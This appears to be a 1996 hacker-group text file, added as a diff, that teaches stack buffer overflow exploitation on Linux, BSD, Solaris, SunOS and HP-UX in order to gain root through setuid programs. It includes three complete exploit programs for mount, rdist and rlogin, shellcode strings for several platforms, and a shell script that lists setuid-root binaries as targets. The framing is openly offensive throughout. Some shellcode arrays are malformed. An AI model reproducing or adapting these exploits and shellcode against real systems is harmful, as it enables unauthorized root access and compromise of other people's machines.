--- /dev/null
+-------------------------------------------------------------------------------\r
+ øSTACK OVERFLOW EXPLOiTS ON LiNUX/BSDOS/FREEBSD/SUNOS/SOLARiS/HP-UXø\r
+-------------------------------------------------------------------------------\r
+\r
+ øintroductionø\r
+ ~~~~~~~~~~~~\r
+ welcome to the world of stack overflows, actually i planned an article\r
+ explaining the complete operation of stack overflows on pc based unix\r
+ systems, but as i read the new phrack magazine issue #49 i realized that\r
+ somebody else had already written this article. well, if you want to learn\r
+ more about the backgrounds (assembler programming/debugging) of stack\r
+ overflows on linux systems and want to read an excellent article get the\r
+ latest phrack magazine issue #49, article 14 by aleph one, the most com-\r
+ plete article i have ever seen, great job! (phrack49.zip)\r
+ but if you are not interested in understanding hundreds of lines pure\r
+ i80386 (disassembled) assembler code and want to have a more practical\r
+ guide, continue reading this article in order to easily learn how to use\r
+ overflow exploits on various unix systems.\r
+\r
+\r
+ øcontentsø\r
+ ~~~~~~~~\r
+ [øaø] øthe stack - small backgroundø\r
+ [øbø] østructure of the stackø\r
+ [øcø] øabusing the return adressø\r
+ [ødø] øexecuting a shell in assemblerø\r
+ [øeø] øgetting the real stack adressø\r
+ [øfø] øenvironment/command line variablesø\r
+ [øgø] øclosing wordsø\r
+\r
+ exploit[ø1ø] ømount.c - linux version: < 2.0.8ø\r
+ exploit[ø2ø] ørdist.c - all bsd version: 2.0ø\r
+ exploit[ø3ø] ørlogin.c - solaris version: 2.5 & 2.5.1ø\r
+\r
+ appendix[øAø] øasm and c code for executionø\r
+ appendix[øBø] ønop commands for different systemsø\r
+ appendix[øCø] øget_sp() for different systemsø\r
+ appendix[øDø] øfindsuid.sh - shellscriptø\r
+\r
+\r
+ [øaø] øthe stack - small backgroundø\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ the main function of every CPU is processing and moving of data. while\r
+ processing or moving the CPU needs a place to fast save important\r
+ information due the limited space of the registers. these information\r
+ are saved to the stack. the stack is a special part of the memory that\r
+ can be accessed with special and very fast commands. the stack is variable\r
+ in length and position.\r
+\r
+ e.g. if a register N is used and a sub-procedure is executed that also\r
+ uses the register N the CPU will save the value of the register N\r
+ onto the stack and restore it after the procedure has terminated. in\r
+ order to improve the speed of this process, the CPU uses the special\r
+ stack commands that are faster than normal movings in memory.\r
+ e.g. if a procedure is executed the CPU needs to know where to return to\r
+ if the procedure is terminated, the return adress is saved on the\r
+ stack before executing the procedure and after terminatig the proce-\r
+ dure the CPU jumps to the return adress stored on the stack.\r
+\r
+ there is a second function of the stack. if a program creates or receives\r
+ data, the new data field will be stored in the memory, all programs use\r
+ dynamic data fields to store such information. the CPU creates such fields\r
+ on the stack if they are needed and removes them if they are not needed\r
+ anymore, local variables or arrays are dynamic.\r
+\r
+ e.g. if a procedure should exchange two variables (a <-> b), it needs a\r
+ third variable c to store one value: c <- a\r
+ a <- b\r
+ b <- c\r
+ the variable c would be installed on the stack and removed after the\r
+ procedure has terminated.\r
+\r
+ for sure you now remember my introducing words promising something like\r
+ "easily creating exploits without learning all the shit behind". well,\r
+ i'm sorry but you have to know some of the backgrounds, and i try to\r
+ explain these as simple as possible. (i could have explained everything\r
+ in assembler code ;]\r
+\r
+\r
+ [øbø] øthe structure of the stackø\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ the stack is structured in a way that confuses some people sometimes (like\r
+ me), the first stored value will be read as last and the last stored value\r
+ will be read as first, this system is called "last in, first out" or LIFO.\r
+ now let's take a closer look at the stack, imagine we have just executed\r
+ a procedure in a program (just to keep your interest: we will later do\r
+ this to gain r00t privileges). how does the stack look like if the\r
+ procedure needs some own local (dynamic) variables?\r
+ .\r
+ .\r
+ : ... . .\r
+ |-----------------------:\r
+ -2048 bytes | local array1[1024] | ...\r
+ |-----------------------|\r
+ -1024 bytes | local array2[1024] | size 1024 bytes\r
+ |-----------------------|\r
+ actual stack position | base pointer | size 4 bytes\r
+ |-----------------------|\r
+ +4 bytes | return adress | size 4 bytes\r
+ |-----------------------|\r
+ +4 bytes : parameters ... | ...\r
+ . :\r
+ . .\r
+\r
+ as you see the different mentioned variables and information are stored on\r
+ the stack. every CPU uses a stack pointer to mark the actual position, it\r
+ is called SP. the interesting parts of the stack are the local array2 and\r
+ the return adress, we don't care about the rest because we want to gain\r
+ r00t access and that is all.\r
+\r
+\r
+ [øcø] øabusing the return adressø\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ as you remember before executing a procedure the CPU saves a return adress\r
+ onto stack, if the procedure terminates the CPU will jump to the return\r
+ adress and continue. but if procedure writes more bytes to a local vari-\r
+ able as its size it will overwrite the return adress and this is called\r
+ overflow.\r
+\r
+ e.g. if (1024+8) 1032 times the character "X" is written to the local\r
+ array2 in the picture above, the procedure will overwrite its own\r
+ return adress. and the stack will look like this:\r
+ .\r
+ .\r
+ : ... . .\r
+ |-----------------------:\r
+ -2048 bytes | local array1[1024] | ...\r
+ |-----------------------|\r
+ -1024 bytes | 1024 times "X" | size 1024 bytes\r
+ |-----------------------|\r
+ actual stack position | 4 times "X" | size 4 bytes\r
+ |-----------------------|\r
+ +4 bytes | 4 times "X" | size 4 bytes\r
+ |-----------------------|\r
+ +4 bytes : parameters ... | ...\r
+ . :\r
+ . .\r
+\r
+ instead of writing the character "X" onto the return adress, we could\r
+ write a new adress onto the stack, we would now force the program to jump\r
+ to where we want!\r
+ it would be very clever if we jump to an adress where we have placed\r
+ some own assembler code that will do something interesting (what do you\r
+ guess?), we could create this assembler code in the local variable; in\r
+ the example local array2:\r
+ .\r
+ .\r
+ : ... .\r
+ |-----------------------:\r
+ -2048 bytes | local array1[1024] |\r
+ |-----------------------|\r
+ -1024 bytes | our code | < -\r
+ |-----------------------| |\r
+ actual stack position | 4 bytes of crap | |\r
+ |-----------------------| |\r
+ +4 bytes | adress of our code | ___|\r
+ |-----------------------|\r
+ +4 bytes : parameters ... |\r
+ . :\r
+ .\r
+\r
+ if the program is owned by r00t and has the suid flag so that a normal\r
+ user can execute it and it will give the user r00t privileges as long\r
+ as it is executed, our code could do something with r00t privilegs!\r
+ but what?\r
+\r
+ [ødø] øexecuting a shell in assemblerø\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ if our code would execute a normal shell and we have created the over-\r
+ flow in a program with the suid flag and it is owned by the r00t we would\r
+ have a complete r00t shell and the system would finally be hacked. what\r
+ we need right now is a short assembler code that will execute a shell,\r
+ well it is not necessary to execute a shell you can also execute any other\r
+ program.\r
+ you can find the corresponding assembler code for the different systems\r
+ in the appendix [A] in pure assembler and compiled in a c char field\r
+ called "execshell".\r
+ if you still want to know how to disassemble such a code read article 14\r
+ of the phrack magazine #49 or contact me via email. "/bin/sh" has been\r
+ added to the code in most cases (exceptions: sparc code), if you want to\r
+ execute a different program just change the char field.\r
+ in order to guarantee our code to function we copy it and lots of nops in\r
+ the data field that will later be copied to the local variable. (nop is\r
+ a shortform of "no operation"). this data field need to be bigger than the\r
+ local variable in order to overwrite the return adress. in the following\r
+ example lv_size is the size of the local variable we want to overflow and\r
+ buffer is the name of the data field (that is also local).\r
+\r
+ e.g. #define lv_size=1024\r
+ char buffer[lv_size+8]\r
+\r
+ we add exactly 8 bytes, take a closer look at the stack above and youl\r
+ will know why. if we want to overwrite the return adress we have to over-\r
+ write 4 bytes base pointer and 4 bytes return adress.\r
+ the data field buffer should look like this:\r
+\r
+ ... <nop> <nop> <nop> <nop> <nop> <code executing a shell>\r
+\r
+ look at this c code in order to learn how we can do this, lv_size is a\r
+ shortform of local variable size, execshell is the char field with our\r
+ assembler code and the path of the shell we want to execute. ptr is a\r
+ pointer to the field that we will copy over the local variable.\r
+\r
+ e.g. the easy version: for(i=0;i<lv_size-strlen(execshell);i++)\r
+ ptr[i]=0x90;\r
+ for(i=0;i<strlen(execshell);i++)\r
+ ptr[i+lv_size-strlen(execshell)]=execshell[i];\r
+\r
+ e.g. the elegant way: memset(ptr,0x90,lv_size-strlen(execshell));\r
+ ptr+=lv_size-strlen(execshell);\r
+ for(i=0;i<strlen(execshell);i++)\r
+ *(ptr++)=execshell[i];\r
+\r
+ these examples are designed for pc based unix system because they use\r
+ 0x90 which is the code for a nop command, on other platforms you have to\r
+ use other codes for nops. i have included several codes for nops, take\r
+ a look at appendix [B].\r
+ i will use the easy version in my exploits because i'm not a professional\r
+ c coder and i prefer indexing like it is used in assembler. now we have\r
+ filled the buffer with our code and some nops and we are finally near our\r
+ goal, becoming r00t.\r
+\r
+ [øeø] øgetting the real stack adressø\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ do you remember that the stack is variable in position and in length?\r
+ if not, read [b] to fresh up your brain. we use a small function to get\r
+ the actual stack adress by saving SP, this adress is the beginning of\r
+ the stack before installing the local variables and the return adress,\r
+ i will called it old SP (OSP) in the example.\r
+ we have to add a variable offset to the OSP, this offset has to be that\r
+ large that the CPU hits a nop when jumping to the return adress.\r
+ .\r
+ . .\r
+ : .\r
+ OSP -> |-----------------------: ------\r
+ -2048 bytes | local array1[1024] | | offset\r
+ |-----------------------| | larger\r
+ -1024 bytes | <...> | | than\r
+ | <nop> | | 1024\r
+ | <nop> | ______|\r
+ | <nop> | < - OSP + offset\r
+ | <nop> | |\r
+ | <our code> | |\r
+ |-----------------------| |\r
+ actual stack position | 4 bytes of crap | |\r
+ |-----------------------| |\r
+ +4 bytes | adress: OSP+offset | ___|\r
+ |-----------------------|\r
+ +4 bytes : parameters ... |\r
+ . :\r
+ .\r
+ in the example we have a local variable in front of the manipulated\r
+ variable, so we have to generate an offset that is larger than the size\r
+ of this variable.\r
+ in order to get the SP value, we use a function called get_sp(), of cause\r
+ there are different methods to get this value on different unix system,\r
+ i have included several versions in appendix [C]. ptr2 is a long or dword\r
+ pointer to ptr which points to the return adress in the buffer.\r
+\r
+ e.g. the correct code: ptr2=(long *)ptr;\r
+ *ptr2=get_sp()+offset;\r
+\r
+ e.g. the robust code: ptr2=(long *)ptr;\r
+ for(i=1;i<8;i++)\r
+ *(ptr2++)=get_sp()+offset;\r
+\r
+ i will use the robust code in my exploits because it writes the return\r
+ adress 8 times to the stack, if our estimated stack adress is wrong,\r
+ we have still 7 other places where it could jump to.\r
+\r
+ [øfø] øenvironment/command line variablesø\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ you are for sure now tired of all this basic and theoratical stuff, you\r
+ are right, it is time to find a target and attack it. the program that\r
+ should be attacked has to be owned by root and has to be set suid. if\r
+ you want to find some of these programs just use the the findsuid shell\r
+ in appendix[D].\r
+ if you have read the upper text parts carefully you now know how to over-\r
+ flow the stack by using a local variable, but how can i detect that a\r
+ program is vunerable to the overflow bug? there are two main ways of\r
+ passing variables to a program the command line and environment variables.\r
+\r
+ e.g. command line variable: cat /test.file\r
+ ^ variable (type: char[256])\r
+\r
+ after loading the machine code of the program and executing the first\r
+ procedures the program will copy the command line into a buffer, if there\r
+ is no size check you can use the command line to overflow the stack, in\r
+ order to find out the size of the command line variable try some chars on\r
+ the command line. (e.g. 1024+4, 256+4, 512+4,...) if the program reports\r
+ "segmentation fault", you can use the program to get r00t access. of cause\r
+ their exist programs with really huge command line e.g. 8000 bytes. if you\r
+ have generated a list of suid/root files on your system, just try if there\r
+ are vunerable on their command line. the second possibilty is to pass the\r
+ variable by using an environment variable.\r
+\r
+ e.g. environment variable: set TERM=1234\r
+\r
+ the program will copy the evironment variable TERM to a buffer, but the\r
+ size of this buffer can be different, in order to overflow it you need\r
+ to check sizes like 256, 512, 1024, 2048 and so on. to find out which\r
+ programs use environment variables is not that easy, of cause you can\r
+ guess that some programs need to read system information from the en-\r
+ viroment variables but the best way to find out is to look inside the\r
+ c source files.\r
+ In any case try to find out new vulnerable programs, because it is always\r
+ better to use exploits that are not common and known to the huge crowd of\r
+ lame exploit abusers.\r
+\r
+ [øgø] øclosing wordsø\r
+ ~~~~~~~~~~~~~~~~~\r
+ after reading all this timewasting crap you should be able to generate\r
+ overflow exploits yourself, as a small demonstration i included three\r
+ sample exploits (which work). I modified the original sources so they've\r
+ got the same variable names as in the examples so that it should be easy for\r
+ you to understand the code.\r
+\r
+ exploits: exploit[1] mount.c - linux version: < 2.0.8\r
+ exploit[2] rdist.c - all bsd version: 2.0\r
+ exploit[3] rlogin.c - solaris version: 2.5 & 2.5.1\r
+\r
+ you have an undefined feeling in your stomach; if you want to complain\r
+ about this article, if you want to flame or diss me, if you want to have\r
+ more information, if you want to swap things or if you just want to leave\r
+ a useless mail, feel free to contact me via e-mail...\r
+ PLASMOID@USA.NET and soon on the THC server PLASMOID@INSECURITY.ORG\r
+ if you are not linked to the internet contact me at the LORE BBS by van\r
+ hauser/thc. you can also contact me via IRC i'm normally in the channel\r
+ #bluebox if my account is not k-lined ;)\r
+\r
+ - plasmoid/thc/deep\r
+ The Hacker's Choice\r
+ Drinking Evil Elite Phreakers\r
+\r
+ plasmoid deep/thc <plasmoid@usa.net>\r
+\r
+ -----BEGIN PGP PUBLIC KEY BLOCK-----\r
+ Version: 2.6.3i\r
+ mQCNAzJZDKwAAAEEANBXUFXqCzZLKuPj7OwB5O7thWOHlzzsi6SEZfsbiysPU4TL\r
+ AMsBuCV4257Rr0//aEMt4CWjAkO3YWcBzBMvGQIDhT06v9SB4LZep6wJlSIsFK3v\r
+ L1x+iYzSlvoXOHYSBcjoXA3sDm+kzz49to77Z20bJru7upjHD8iQeMWdAg+hAAUR\r
+ tBtwbGFzbW9pZCA8cGxhc21vaWRAdXNhLm5ldD6JAJUDBRAyWQysyJB4xZ0CD6EB\r
+ AQ6GBACB1n9DkgHfnC7D245MZPpacEHI8Jwj0DV6inV19E9qWf4VDdXA8+9YLuUV\r
+ hsV1/WRX3sJWGWmAQASPitl2tc+7vWw6VC4gjif1XsRttIuNwmvU+DPY7ZULueFe\r
+ bKoLI2zXsnWm/+8PMjc6GSYsNrXSpUjqkH6nIt6+sytm2QyWBw==\r
+ =Vbcq\r
+ -----END PGP PUBLIC KEY BLOCK-----\r
+\r
+\r
+ øexploitø[ø1ø]\r
+ ~~~~~~~~~~\r
+ /* -------------------------------------------------------------------------\r
+ mount.c - mount exploit for linux - version: < 2.0.10\r
+ discovered by bloodmask&vio/couin\r
+ coded by plasmoid/thc/deep for thc-magazine issue #3\r
+ 12/12/96 - works also on umount\r
+ ------------------------------------------------------------------------- */\r
+\r
+ #include <stdio.h>\r
+\r
+ #define lv_size 1024\r
+ #define offset 30+lv_size+8*4\r
+ // -------------------------------------------------------------------------\r
+ long get_sp()\r
+ {\r
+ __asm__("movl %esp, %eax");\r
+ }\r
+ // -------------------------------------------------------------------------\r
+ main(int argc, char **argv)\r
+ {\r
+ char execshell[] =\r
+ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"\r
+ "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"\r
+ "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";\r
+\r
+ char buffer[lv_size+4*8];\r
+ unsigned long *ptr2 = NULL;\r
+ char *ptr = NULL;\r
+ int i;\r
+\r
+ for(i=0;i<lv_size+4*8;i++)\r
+ buffer[i]=0x00;\r
+ ptr=buffer;\r
+\r
+ for(i=0;i<lv_size-strlen(execshell);i++)\r
+ *(ptr++)=0x90;\r
+ for(i=0;i<strlen(execshell);i++)\r
+ *(ptr++)=execshell[i];\r
+ ptr2=(long *)ptr;\r
+ for(i=1;i<2;i++)\r
+ *(ptr2++)=get_sp()+offset;\r
+\r
+ printf("discovered by bloodmask&vio/couin\ncoded by plasmoid/thc/deep\nfor thc-magazine issue #3\n");\r
+ (void)alarm((int)0);\r
+ execl("/bin/mount", "mount", buffer, NULL);\r
+ }\r
+\r
+\r
+ øexploitø[ø2ø]\r
+ ~~~~~~~~~~\r
+ /* -------------------------------------------------------------------------\r
+ rdist.c - rdist exploit for freebsd & bsd/os - version: 2.0\r
+ discovered by brian mitchell\r
+ coded by plasmoid/thc/deep for thc-magazine issue #3\r
+ 12/12/96\r
+ ------------------------------------------------------------------------- */\r
+\r
+ #include <stdio.h>\r
+\r
+ #define lv_size 256\r
+ #define offset 30+lv_size+8*4\r
+ // -------------------------------------------------------------------------\r
+ long get_sp()\r
+ {\r
+ __asm__("movl %esp, %eax");\r
+ }\r
+ // -------------------------------------------------------------------------\r
+ main(int argc, char **argv)\r
+ {\r
+ char execshell[]=\r
+ "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"\r
+ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"\r
+ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"\r
+ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";\r
+\r
+ char buffer[lv_size+4*8];\r
+ unsigned long *ptr2 = NULL;\r
+ char *ptr = NULL;\r
+ int i;\r
+\r
+ for(i=0;i<lv_size+4*8;i++)\r
+ buffer[i]=0x00;\r
+ ptr=buffer;\r
+\r
+ for(i=0;i<lv_size-strlen(execshell);i++)\r
+ *(ptr++)=0x90;\r
+ for(i=0;i<strlen(execshell);i++)\r
+ *(ptr++)=execshell[i];\r
+ ptr2=(long *)ptr;\r
+ for(i=1;i<2;i++)\r
+ *(ptr2++)=get_sp()+offset;\r
+\r
+ printf("discovered by brian mitchell\ncoded by plasmoid/thc/deep\nfor thc-magazine issue #3\n");\r
+ execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);\r
+ }\r
+\r
+\r
+ øexploitø[ø3ø]\r
+ ~~~~~~~~~~\r
+/*\r
+ * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines\r
+ * by exploiting the gethostbyname() overflow in rlogin.\r
+ *\r
+ * gcc -o rlogin-exploit rlogin-exploit.c\r
+ *\r
+ * Jeremy Elson, 18 Nov 1996\r
+ * jeremy.elson@nih.gov\r
+ */\r
+\r
+#include <stdio.h>\r
+#include <stdlib.h>\r
+#include <sys/types.h>\r
+#include <unistd.h>\r
+\r
+#define BUF_LENGTH 8200\r
+#define EXTRA 100\r
+#define STACK_OFFSET 4000\r
+#define SPARC_NOP 0xa61cc013\r
+\r
+u_char sparc_shellcode[] =\r
+"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"\r
+"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"\r
+"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"\r
+"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"\r
+"\x82\x10\x20\x3b\x91\xd4\xff\xff";\r
+\r
+u_long get_sp(void)\r
+{\r
+ __asm__("mov %sp,%i0 \n");\r
+}\r
+\r
+void main(int argc, char *argv[])\r
+{\r
+ char buf[BUF_LENGTH + EXTRA];\r
+ long targ_addr;\r
+ u_long *long_p;\r
+ u_char *char_p;\r
+ int i, code_length = strlen(sparc_shellcode);\r
+\r
+ long_p = (u_long *) buf;\r
+\r
+ for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)\r
+ *long_p++ = SPARC_NOP;\r
+\r
+ char_p = (u_char *) long_p;\r
+\r
+ for (i = 0; i < code_length; i++)\r
+ *char_p++ = sparc_shellcode[i];\r
+\r
+ long_p = (u_long *) char_p;\r
+\r
+ targ_addr = get_sp() - STACK_OFFSET;\r
+ for (i = 0; i < EXTRA / sizeof(u_long); i++)\r
+ *long_p++ = targ_addr;\r
+\r
+ printf("Jumping to address 0x%lx\n", targ_addr);\r
+\r
+ execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);\r
+ perror("execl failed");\r
+}\r
+\r
+\r
+ øappendixø[øAø]\r
+ ~~~~~~~~~~~\r
+-------------------------------------------------------------------------------\r
+ linux/i80386+\r
+-------------------------------------------------------------------------------\r
+ assembler code:\r
+ ~~~~~~~~~~~~~~\r
+ jmp end_of_code\r
+ execve: popl %esi\r
+ movl %esi,0x8(%esi)\r
+ xorl %eax,%eax\r
+ movb %eax,0x7(%esi)\r
+ movl %eax,0xc(%esi)\r
+ movb $0xb,%al\r
+ movl %esi,%ebx\r
+ leal 0x8(%esi),%ecx\r
+ leal 0xc(%esi),%edx\r
+ int $0x80\r
+ xorl %ebx,%ebx\r
+ movl %ebx,%eax\r
+ inc %eax\r
+ int $0x80\r
+ end_of_code: call exec_prog\r
+ .string "/bin/sh\"\r
+\r
+ string for c code:\r
+ ~~~~~~~~~~~~~~~~~~\r
+ char execshell[] =\r
+ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"\r
+ "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"\r
+ "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";\r
+\r
+-------------------------------------------------------------------------------\r
+ bsd/os/i80386+ and freebsd/i80386+\r
+-------------------------------------------------------------------------------\r
+ assembler code:\r
+ ~~~~~~~~~~~~~~~\r
+ jmp end_of_code\r
+ execve: popl %esi\r
+ leal (%esi), %ebx\r
+ movl %ebx, 0x0b(%esi)\r
+ xorl %edx, %edx\r
+ movl %edx, 7(%esi)\r
+ movl %edx, 0x0f(%esi)\r
+ movl %edx, 0x14(%esi)\r
+ movb %edx, 0x19(%esi)\r
+ xorl %eax, %eax\r
+ movb $59, %al\r
+ leal 0x0b(%esi), %ecx\r
+ movl %ecx, %edx\r
+ pushl %edx\r
+ pushl %ecx\r
+ pushl %ebx\r
+ pushl %eax\r
+ jmp bewm\r
+ end_of_code: call execve\r
+ .string '/bin/sh'\r
+ .byte 1, 1, 1, 1\r
+ .byte 2, 2, 2, 2\r
+ .byte 3, 3, 3, 3\r
+ bewm: .byte 0x9a, 4, 4, 4, 4, 7, 4\r
+\r
+ string for c code:\r
+ ~~~~~~~~~~~~~~~~~~\r
+ char execshell[]=\r
+ "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"\r
+ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"\r
+ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"\r
+ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";\r
+\r
+\r
+\r
+------------------------------------------------------------------------------\r
+ solaris/sparc processor\r
+------------------------------------------------------------------------------\r
+ assembler code:\r
+ ~~~~~~~~~~~~~~~\r
+ sethi 0xbd89a, %l6\r
+ or %l6, 0x16e, %l6\r
+ sethi 0xbdcda, %l7\r
+ and %sp, %sp, %o0\r
+ add %sp, 8, %o1\r
+ xor %o2, %o2, %o2\r
+ add %sp, 16, %sp\r
+ std %l6, [%sp - 16]\r
+ st %sp, [%sp - 8]\r
+ st %g0, [%sp - 4]\r
+ mov 0x3b, %g1\r
+ ta 8\r
+ xor %o7, %o7, %o0\r
+ mov 1, %g1\r
+ ta 8\r
+\r
+ string for c code:\r
+ ~~~~~~~~~~~~~~~~~~\r
+ char execshell[59]=\r
+ 0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,\r
+ 0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,\r
+ 0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,\r
+ 0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x08,0x90,0x1b,0xc0,0x0f,\r
+ 0x82,0x10,0x20,0x01,0x91,0xd0,0x20,0x08";\r
+\r
+ optional version:\r
+ char execshell[54]=\r
+ 0x9fc0202c,0xc0247ff5,0xe227bff0,0xc027bff4,0x9207bff0,0x901d200a,\r
+ 0x901a200a,0x8210203b,0x91d02008,0x82102001,0x91d02008,0xa3c3e004,\r
+ "/bin/sh";\r
+\r
+\r
+------------------------------------------------------------------------------\r
+ sunos/sparc processor\r
+------------------------------------------------------------------------------\r
+ assembler code:\r
+ ~~~~~~~~~~~~~~~\r
+ sethi 0xbd89a, %l6\r
+ or %l6, 0x16e, %l6\r
+ sethi 0xbdcda, %l7\r
+ and %sp, %sp, %o0\r
+ add %sp, 8, %o1\r
+ xor %o2, %o2, %o2\r
+ add %sp, 16, %sp\r
+ std %l6, [%sp - 16]\r
+ st %sp, [%sp - 8]\r
+ st %g0, [%sp - 4]\r
+ mov 0x3b, %g1\r
+ mov -0x1, %l5\r
+ ta %l5 + 1\r
+ xor %o7, %o7, %o0\r
+ mov 1, %g1\r
+ ta %l5 + 1\r
+\r
+ string for c code:\r
+ ~~~~~~~~~~~~~~~~~~\r
+ char execshell[63]=\r
+ 0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,\r
+ 0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,\r
+ 0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,\r
+ 0xfc,0x82,0x10,0x20,0x3b,0xaa,0x10,0x3f,0xff,0x91,0xd5,0x60,0x01,\r
+ 0x90,0x1b,0xc0,0x0f,0x82,0x10,0x20,0x01,0x91,0xd5,0x60,0x01";\r
+\r
+------------------------------------------------------------------------------\r
+ hp-ux9/hp9000\r
+------------------------------------------------------------------------------\r
+ string for c code:\r
+ ~~~~~~~~~~~~~~~~~~\r
+ char execshell[]=\r
+ "\x34\x59\x01\x02\x34\x5a\x01\x32\x37\x5a\x3e\xf9\x6b\x3a\x3f\x01"\r "\x63\x40\x3f\xff\x34\x5a\x01\x38\x63\x40\x3f\x35\x37\x5a\x3e\xf9"\r
+ "\x6b\x3a\x3f\x09\x63\x40\x3f\xff\x0b\x5a\x02\x9a\x6b\x3a\x3f\x11"\r
+ "\x34\x5a\x01\x22\x37\x5a\x3e\xf9\x6f\x3a\x3e\xf9\x20\x20\x08\x01"\r
+ "\x34\x16\x01\x1e\xe4\x20\xe0\x08\x36\xd6\x3e\xf9\x0b\x5a\x02\x9a"\r
+ "\x20\x20\x08\x01\x34\x16\x01\x0a\xe4\x20\xe0\x08\x36\xd6\x3e\xf9"\r
+ "\xe8\x5f\x1f\x35\x0b\x5a\x02\x9a\x01\x01\x01\x01\x01\x01\x01\x01"\r "\x01\x01\x01\x01\x01\x01\x01\x01\x00/bin/sh";\r\r
+ øappendixø[øBø]\r
+ ~~~~~~~~~~~\r
+-------------------------------------------------------------------------------\r
+ no operation - nop - for the different systems\r
+-------------------------------------------------------------------------------\r
+ linux/i80386+ - char nop[1]=0x90;\r
+ bsd/os/i80386+ and freebsd/i80386+ - char nop[1]=0x90;\r
+ solaris/sparc processor - char nop[4]=0xac15a16e;\r
+ sunos/sparc processor - char nop[4]=0xac15a16e;\r
+ hp-ux9/hp9000 - char nop[4]=0xac15a16e;\r
+\r
+ øappendixø[øCø]\r
+ ~~~~~~~~~~~\r
+-------------------------------------------------------------------------------\r
+ linux/i80386+ and bsd/os/i80386+ and freebsd/i80386+\r
+-------------------------------------------------------------------------------\r
+ getting the stackpointer:\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ long get_sp()\r
+ {\r
+ __asm__("movl %esp,%eax");\r
+ }\r
+\r
+-------------------------------------------------------------------------------\r
+ solaris/sparc processor and sunos/sparc processor\r
+-------------------------------------------------------------------------------\r
+ getting the stackpointer:\r
+ ~~~~~~~~~~~~~~~~~~~~~~~~~\r
+ long get_sp()\r
+ {\r
+ asm("or %sp, %sp, %i0");\r
+ }\r
+\r
+ øappendixø[øDø]\r
+ ~~~~~~~~~~\r
+--------------------------------------------------------------------[cut here]-\r
+ #!/bin/sh\r
+ # findsuid.sh by plasmoid/thc/deep\r
+ # important directories for linux system, try different ones\r
+ # for other systems (/usr/etc, /usr/local/bin, /usr/local/etc, /usr/sbin)\r
+ find /bin -user root -perm +a=s > suid.lst\r
+ find /sbin -user root -perm +a=s >> suid.lst\r
+ find /usr/bin -user root -perm +a=s >> suid.lst\r
+ find /etc -user root -perm +a=s >> suid.lst\r
+ find /var -user root -perm +a=s >> suid.lst\r
+--------------------------------------------------------------------[cut here]-\r
+\r
+ <END OF FiLE - THC iN 1996>\r
+\1a
\ No newline at end of file